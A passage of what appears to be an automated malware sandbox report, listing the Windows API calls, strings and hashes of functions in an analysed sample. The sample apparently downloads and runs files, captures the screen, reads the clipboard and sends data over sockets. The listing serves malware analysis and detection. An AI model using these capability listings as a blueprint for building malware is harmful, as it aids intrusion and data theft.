• CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
• Opcode ID: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
• Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
• Opcode Fuzzy Hash: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
• Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
• _wcschr.LIBVCRUNTIME ref: 00451E4A
• _wcschr.LIBVCRUNTIME ref: 00451E58
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID: sJD
• API String ID: 4212172061-3536923933
• Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
• Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
• Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
• Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
  • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
  • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
• Sleep.KERNEL32(00000BB8), ref: 0040F85B
• ExitProcess.KERNEL32 ref: 0040F8CA
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 4.9.4 Pro$override$pth_unenc
• API String ID: 2281282204-930821335
• Opcode ID: 58c5b883e5d172f22ef58a46adbd46fba81c8570fd30b9f4b5b12bcade53b407
• Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
• Opcode Fuzzy Hash: 58c5b883e5d172f22ef58a46adbd46fba81c8570fd30b9f4b5b12bcade53b407
• Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
• LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
• LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
• SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
Strings
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
• Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
• Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
• Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
• Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0040966A
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
• FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
• Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
• Opcode Fuzzy Hash: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
• Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00408811
• FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
• __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
• Opcode ID: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
• Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
• Opcode Fuzzy Hash: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
• Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
Uniqueness

Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DownloadExecuteFileShell
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif$open
                                                                                        • API String ID: 2825088817-2369784581
                                                                                        • Opcode ID: 5505d1f989835e5386e0be1d1f6824a76adf241377c16252f380900cbb29c9cd
                                                                                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                                                        • Opcode Fuzzy Hash: 5505d1f989835e5386e0be1d1f6824a76adf241377c16252f380900cbb29c9cd
                                                                                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileFind$FirstNextsend
                                                                                        • String ID: XPG$XPG
                                                                                        • API String ID: 4113138495-1962359302
                                                                                        • Opcode ID: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                                                                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                                                        • Opcode Fuzzy Hash: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                                                                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                                                                          • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                                                                          • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                        • API String ID: 4127273184-3576401099
                                                                                        • Opcode ID: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                                                                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                                        • Opcode Fuzzy Hash: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                                                                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                                                                        • ExitProcess.KERNEL32 ref: 004432EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 1703294689-263838557
                                                                                        • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                        • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                                                        • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                        • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 0-263838557
                                                                                        • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                        • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                                                                        • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                        • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1815803762-0
                                                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenClipboard.USER32(00000000), ref: 0040B711
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                                                                        • CloseClipboard.USER32 ref: 0040B725
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Clipboard$CloseDataOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2058664381-0
                                                                                        • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                                                                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                                        • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                                                                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 2325560087-3916222277
                                                                                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                                                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                                                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$ComputerUser
                                                                                        • String ID:
                                                                                        • API String ID: 4229901323-0
                                                                                        • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                                                                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                                        • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                                                                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                                                                        • HeapFree.KERNEL32(00000000), ref: 004120EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                                                                        • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                                                                        • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                                                                        • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                                        • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                                        • GetCursorInfo.USER32(?), ref: 00418FA7
                                                                                        • GetIconInfo.USER32(?,?), ref: 00418FBD
                                                                                        • DeleteObject.GDI32(?), ref: 00418FEC
                                                                                        • DeleteObject.GDI32(?), ref: 00418FF9
                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                                        • DeleteDC.GDI32(?), ref: 0041917C
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                                        • DeleteObject.GDI32(00000000), ref: 00419182
                                                                                        • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                                        • DeleteObject.GDI32(00000000), ref: 00419241
                                                                                        • GlobalFree.KERNEL32(?), ref: 00419248
                                                                                        • DeleteDC.GDI32(?), ref: 00419258
                                                                                        • DeleteDC.GDI32(00000000), ref: 00419263
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                        • String ID: DISPLAY
                                                                                        • API String ID: 4256916514-865373369
                                                                                        • Opcode ID: d098f0494e6cf70b6a27a8e3a9167c03c8027aa06e67c3efe5d1aa02d08667bb
                                                                                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
